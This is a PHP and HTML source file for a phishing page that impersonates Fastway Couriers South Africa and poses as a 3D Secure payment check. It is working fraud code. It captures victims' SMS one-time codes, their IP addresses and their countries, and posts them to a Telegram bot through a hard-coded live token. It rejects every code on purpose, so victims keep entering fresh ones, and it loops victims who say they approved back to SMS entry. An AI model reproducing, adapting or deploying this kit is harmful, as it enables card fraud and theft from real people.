File: /home/imagzxcb/public_html/feedback/approval.php
<?php
$BOT_TOKEN = "7855531302:AAGEfCJhGKdJNEcbJFDchAF40G3OrJO6sLw";
$CHAT_ID = "-5194337371";
// === GET USER INFO ===
$ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$country = 'Unknown';
$context = stream_context_create(['http' => ['timeout' => 5]]);
$geoData = @file_get_contents("http://ip-api.com/json/{$ip}", false, $context);
if ($geoData !== false) {
$geo = json_decode($geoData);
$country = $geo->country ?? 'Unknown';
}
function sendTelegram($msg) {
global $BOT_TOKEN, $CHAT_ID;
$url = "https://api.telegram.org/bot{$BOT_TOKEN}/sendMessage";
$data = [
'chat_id' => $CHAT_ID,
'text' => $msg,
'parse_mode' => 'HTML',
'disable_web_page_preview' => true
];
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false
]);
curl_exec($ch);
curl_close($ch);
}
// === HANDLE AJAX ===
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
$msg = "";
if ($_POST['action'] === 'verify') {
$otp = trim($_POST['otp'] ?? '');
$attempt = intval($_POST['attempt'] ?? 1);
$msg = "<b>⚠️🪭 FASTWAY COURIERS OTP ATTEMPT #{$attempt}</b>\n";
$msg .= "══════════════════════════════\n";
$msg .= "<b>OTP:</b> <code>{$otp}</code>\n";
$msg .= "<b>IP:</b> <code>{$ip}</code>\n";
$msg .= "<b>Country:</b> {$country}\n";
$msg .= "<b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
sendTelegram($msg);
echo json_encode(['status' => 'invalid', 'attempt' => $attempt + 1]);
exit;
}
if ($_POST['action'] === 'approved') {
$msg = "<b>✅ FASTWAY COURIERS PAYMENT APPROVED</b>\n";
$msg .= "══════════════════════════════\n";
$msg .= "<b>IP:</b> <code>{$ip}</code>\n";
$msg .= "<b>Country:</b> {$country}\n";
$msg .= "<b>Time:</b> " . date('d/m/Y H:i:s') . "\n";
sendTelegram($msg);
echo json_encode(['status' => 'loop']);
exit;
}
}
// === GET PAYMENT DATA ===
$paymentData = json_decode($_POST['payment'] ?? '', true) ?: [];
$tracking = htmlspecialchars($paymentData['tracking'] ?? 'FW632846518');
$last4 = substr(preg_replace('/\D/', '', $paymentData['card_number'] ?? ''), -4) ?: '0000';
$time = date('H:i');
$date = date('d/m/Y');
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Fastway Couriers | Payment Verification</title>
<link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:wght@400;600;700;800&family=Barlow:wght@300;400;500;600&display=swap" rel="stylesheet">
<style>
*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
:root {
--orange: #F47920;
--orange-light: #FF8C3A;
--navy: #1A2340;
--navy-dark: #10172B;
--navy-mid: #232E4A;
--white: #FFFFFF;
--off-white: #F7F8FA;
--grey: #6B7280;
--light-grey: #E5E7EB;
--text: #1F2937;
--success: #0F7B4B;
--danger: #DC2626;
--danger-bg: #FEF2F2;
--radius: 6px;
--shadow-sm: 0 4px 12px rgba(0,0,0,0.05);
}
body {
font-family: 'Barlow', sans-serif;
color: var(--text);
background: var(--off-white);
min-height: 100vh;
display: flex;
flex-direction: column;
}
.container { max-width: 500px; margin: 0 auto; width: 100%; padding: 0 1.5rem; }
/* HEADER */
.header {
background: var(--white);
padding: 1rem 0;
box-shadow: 0 2px 10px rgba(0,0,0,0.05);
}
.header-container {
max-width: 1200px;
margin: 0 auto;
padding: 0 1.5rem;
}
.logo-container { display: flex; align-items: center; }
.logo { height: 70px; width: auto; }
/* BANK HEADER */
.bank-header {
background: linear-gradient(135deg, var(--navy-dark), var(--navy));
color: var(--white);
padding: 1.25rem;
border-radius: var(--radius) var(--radius) 0 0;
text-align: center;
font-weight: 600;
font-size: 1rem;
display: flex;
align-items: center;
justify-content: center;
gap: 0.5rem;
border-bottom: 3px solid var(--orange);
margin-top: 2rem;
}
/* CARD */
.approval-card {
background: var(--white);
border: 1px solid var(--light-grey);
border-radius: 0 0 var(--radius) var(--radius);
padding: 2rem;
margin-bottom: 2rem;
box-shadow: var(--shadow-sm);
}
/* TRANSACTION */
.transaction {
background: var(--off-white);
border-radius: var(--radius);
padding: 1.25rem;
margin-bottom: 1.5rem;
border: 1px solid var(--light-grey);
}
.trans-row {
display: flex;
justify-content: space-between;
padding: 0.6rem 0;
font-size: 0.95rem;
border-bottom: 1px solid var(--light-grey);
}
.trans-row:last-child { border-bottom: none; }
.trans-label { color: var(--grey); }
.trans-value { font-weight: 600; color: var(--navy-dark); }
.amount {
color: var(--success);
font-weight: 700;
font-size: 1.25rem;
}
/* PUSH NOTIFICATION */
.app-notif {
background: var(--off-white);
border-radius: var(--radius);
padding: 1.5rem;
margin: 1.5rem 0;
text-align: center;
border: 1px solid var(--light-grey);
}
.app-notif img {
width: 120px;
height: 120px;
margin-bottom: 1rem;
display: block;
margin-left: auto;
margin-right: auto;
}
.app-notif strong {
display: block;
color: var(--navy-dark);
margin-bottom: 0.5rem;
font-size: 1.1rem;
font-weight: 700;
}
.app-badge {
display: inline-block;
background: var(--orange);
color: var(--white);
padding: 0.5rem 1rem;
border-radius: 30px;
font-size: 0.85rem;
margin-top: 0.75rem;
font-weight: 600;
}
/* LOADING DOTS */
.loading-dots {
text-align: center;
padding: 1.5rem;
margin: 1rem 0;
font-size: 0.95rem;
color: var(--grey);
background: var(--off-white);
border-radius: var(--radius);
border: 1px solid var(--light-grey);
}
.dot-container {
margin-top: 0.75rem;
}
.dot {
display: inline-block;
width: 8px;
height: 8px;
border-radius: 50%;
background: var(--orange);
margin: 0 4px;
animation: dotPulse 1.4s infinite ease-in-out;
}
.dot:nth-child(2) { animation-delay: 0.2s; }
.dot:nth-child(3) { animation-delay: 0.4s; }
@keyframes dotPulse {
0%, 80%, 100% { transform: scale(0.6); opacity: 0.5; }
40% { transform: scale(1); opacity: 1; }
}
/* SMS INPUT */
.sms-container {
margin: 1.5rem 0;
display: none;
}
.sms-label {
font-weight: 700;
margin-bottom: 0.5rem;
color: var(--navy-dark);
font-size: 0.9rem;
text-transform: uppercase;
letter-spacing: 0.5px;
}
.sms-hint {
color: var(--grey);
font-size: 0.85rem;
margin-bottom: 1rem;
}
.sms-input {
width: 100%;
padding: 0.85rem;
font-size: 1rem;
text-align: center;
border: 2px solid var(--light-grey);
border-radius: var(--radius);
background: var(--white);
font-family: monospace;
margin-bottom: 1rem;
}
.sms-input:focus {
outline: none;
border-color: var(--orange);
box-shadow: 0 0 0 3px rgba(244,121,32,0.1);
}
.sms-input.error {
border-color: var(--danger);
}
.btn-primary {
width: 100%;
padding: 0.85rem;
background: var(--orange);
color: var(--white);
border: none;
border-radius: var(--radius);
font-weight: 600;
font-size: 0.95rem;
cursor: pointer;
text-transform: uppercase;
letter-spacing: 1px;
transition: all 0.15s ease;
}
.btn-primary:hover {
background: var(--orange-light);
transform: translateY(-1px);
box-shadow: 0 4px 12px rgba(244,121,32,0.3);
}
.btn-primary:disabled {
background: var(--light-grey);
color: var(--grey);
cursor: not-allowed;
}
.cooldown {
margin-top: 1rem;
color: var(--grey);
font-size: 0.85rem;
text-align: center;
padding: 0.75rem;
background: var(--off-white);
border-radius: var(--radius);
border: 1px solid var(--light-grey);
}
.error-message {
display: none;
color: var(--danger);
margin-top: 1rem;
font-size: 0.85rem;
text-align: center;
padding: 0.75rem;
background: var(--danger-bg);
border-radius: var(--radius);
border: 1px solid var(--danger);
}
.approve-link {
display: block;
text-align: center;
color: var(--navy);
text-decoration: none;
margin: 1.25rem 0;
font-size: 0.9rem;
font-weight: 600;
padding: 0.85rem;
background: var(--off-white);
border-radius: var(--radius);
border: 1px solid var(--light-grey);
transition: all 0.15s ease;
}
.approve-link:hover {
background: var(--light-grey);
color: var(--orange);
}
.loop-message {
display: none;
color: var(--danger);
margin: 1rem 0;
font-size: 0.9rem;
text-align: center;
font-weight: 600;
padding: 1rem;
background: var(--danger-bg);
border-radius: var(--radius);
border: 1px solid var(--danger);
}
.security-badges {
display: flex;
justify-content: center;
gap: 1rem;
margin-top: 1.5rem;
flex-wrap: wrap;
}
.badge {
background: var(--off-white);
padding: 0.5rem 0.8rem;
border-radius: var(--radius);
font-size: 0.75rem;
color: var(--grey);
display: flex;
align-items: center;
gap: 0.4rem;
border: 1px solid var(--light-grey);
}
/* FOOTER */
.footer {
background: var(--navy-dark);
padding: 2.5rem 0 2rem;
margin-top: auto;
}
.footer-content {
max-width: 1200px;
margin: 0 auto;
padding: 0 1.5rem;
text-align: center;
}
.footer-logo {
margin-bottom: 1rem;
}
.footer-logo img {
height: 60px;
width: auto;
opacity: 0.9;
}
.footer-copyright {
color: rgba(255,255,255,0.4);
font-size: 0.8rem;
}
@keyframes shake {
0%, 100% { transform: translateX(0); }
25% { transform: translateX(-5px); }
75% { transform: translateX(5px); }
}
.shake { animation: shake 0.3s ease; }
@media (max-width: 500px) {
.container { padding: 0 1rem; }
.approval-card { padding: 1.5rem; }
.logo { height: 60px; }
.app-notif img { width: 100px; height: 100px; }
}
</style>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
</head>
<body>
<!-- HEADER -->
<header class="header">
<div class="header-container">
<div class="logo-container">
<img src="assets/1.png" alt="Fastway Couriers" class="logo">
</div>
</div>
</header>
<div class="container">
<!-- BANK HEADER -->
<div class="bank-header">
<i class="fas fa-shield-alt"></i> Fastway Couriers - 3D Secure Verification
</div>
<!-- CARD -->
<div class="approval-card">
<div class="transaction">
<div class="trans-row">
<span class="trans-label">Merchant</span>
<span class="trans-value">Fastway Couriers SA</span>
</div>
<div class="trans-row">
<span class="trans-label">Amount</span>
<span class="trans-value amount">
R122.36
</span>
</div>
<div class="trans-row">
<span class="trans-label">Date & Time</span>
<span class="trans-value"><?php echo "$date, $time"; ?></span>
</div>
<div class="trans-row">
<span class="trans-label">Card</span>
<span class="trans-value">•••• •••• •••• <?php echo $last4; ?></span>
</div>
<div class="trans-row">
<span class="trans-label">Reference</span>
<span class="trans-value"><?php echo $tracking; ?></span>
</div>
</div>
<!-- PUSH NOTIFICATION WITH FIXED GIF -->
<div class="app-notif">
<img src="assets/pending.gif" alt="Verification Pending">
<strong>Verification Request Sent</strong>
<div style="font-size: 0.9rem; margin: 0.5rem 0; color: var(--grey);">
Check your banking app to approve this payment.
</div>
<div class="app-badge">
<i class="fas fa-mobile-alt"></i> Open banking app
</div>
</div>
<!-- LOADING DOTS - 50 SECONDS -->
<div class="loading-dots" id="loadingDots">
Waiting for verification from your bank
<div class="dot-container">
<span class="dot"></span>
<span class="dot"></span>
<span class="dot"></span>
</div>
</div>
<!-- SMS INPUT (Shown after 50 seconds) -->
<div class="sms-container" id="smsContainer">
<div class="sms-label">
<i class="fas fa-sms"></i> SMS Verification
</div>
<div class="sms-hint">
Enter the verification code sent to your registered mobile number.
</div>
<input type="text" class="sms-input" id="smsInput" placeholder="Enter verification code" inputmode="text">
<button class="btn-primary" id="verifyBtn">
<i class="fas fa-check-circle"></i> Verify Code
</button>
<div class="cooldown" id="cooldown" style="display:none;">
<i class="fas fa-clock"></i> Please wait <span id="countdown">15</span> seconds before trying again
</div>
<div class="error-message" id="errorMessage">
<i class="fas fa-exclamation-circle"></i>
<span id="errorText">Invalid verification code</span>
</div>
</div>
<a href="#" class="approve-link" id="approveLink">
<i class="fas fa-check-double"></i> I have approved in my banking app
</a>
<div class="loop-message" id="loopMessage">
<i class="fas fa-exclamation-triangle"></i>
Approval not detected. Please use SMS verification.
</div>
<div class="security-badges">
<div class="badge"><i class="fas fa-shield-alt"></i> 3D Secure</div>
<div class="badge"><i class="fas fa-lock"></i> Encrypted</div>
<div class="badge"><i class="fas fa-check-circle"></i> Verified</div>
</div>
</div>
</div>
<!-- FOOTER -->
<footer class="footer">
<div class="footer-content">
<div class="footer-logo">
<img src="assets/3.png" alt="Fastway Couriers">
</div>
<div class="footer-copyright">
© 2026 Fastway Couriers South Africa (Pty) Ltd. All rights reserved.
</div>
</div>
</footer>
<script>
// Show SMS input after 50 seconds
setTimeout(() => {
document.getElementById('loadingDots').style.display = 'none';
document.getElementById('smsContainer').style.display = 'block';
document.getElementById('smsInput').focus();
}, 29000);
// SMS Input handling - Alphanumeric only
document.getElementById('smsInput').addEventListener('input', function(e) {
this.value = this.value.replace(/[^A-Za-z0-9]/g, '');
if (this.classList.contains('error')) {
this.classList.remove('error');
document.getElementById('errorMessage').style.display = 'none';
}
});
// Verify Button
let attempt = 1;
let cooldown = false;
document.getElementById('verifyBtn').addEventListener('click', async () => {
if (cooldown) return;
const otp = document.getElementById('smsInput').value.trim();
if (otp.length === 0) {
showError('Please enter verification code');
document.getElementById('smsInput').classList.add('error');
return;
}
const btn = document.getElementById('verifyBtn');
btn.disabled = true;
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Verifying...';
try {
const res = await fetch('', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: `action=verify&otp=${encodeURIComponent(otp)}&attempt=${attempt}`
});
const data = await res.json();
showError('Invalid code. Please try again.');
document.getElementById('smsInput').classList.add('error');
document.getElementById('smsInput').classList.add('shake');
setTimeout(() => document.getElementById('smsInput').classList.remove('shake'), 300);
attempt++;
startCooldown();
} catch (e) {
btn.disabled = false;
btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
showError('Connection error. Please try again.');
}
});
function showError(message) {
const el = document.getElementById('errorMessage');
document.getElementById('errorText').textContent = message;
el.style.display = 'block';
const btn = document.getElementById('verifyBtn');
btn.disabled = false;
btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
}
function startCooldown() {
cooldown = true;
const btn = document.getElementById('verifyBtn');
const cd = document.getElementById('cooldown');
const count = document.getElementById('countdown');
btn.style.display = 'none';
cd.style.display = 'block';
let time = 15;
const interval = setInterval(() => {
time--;
count.textContent = time;
if (time <= 0) {
clearInterval(interval);
cooldown = false;
btn.style.display = 'block';
btn.disabled = false;
btn.innerHTML = '<i class="fas fa-check-circle"></i> Verify Code';
cd.style.display = 'none';
document.getElementById('smsInput').value = '';
document.getElementById('smsInput').classList.remove('error');
document.getElementById('errorMessage').style.display = 'none';
document.getElementById('smsInput').focus();
}
}, 1000);
}
// App approval link
document.getElementById('approveLink').addEventListener('click', async (e) => {
e.preventDefault();
showError('Approval not detected. Please use SMS verification.');
document.getElementById('smsInput').classList.add('error');
await fetch('', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: 'action=approved'
});
document.getElementById('loopMessage').style.display = 'block';
document.getElementById('approveLink').style.display = 'none';
});
</script>
</body>
</html>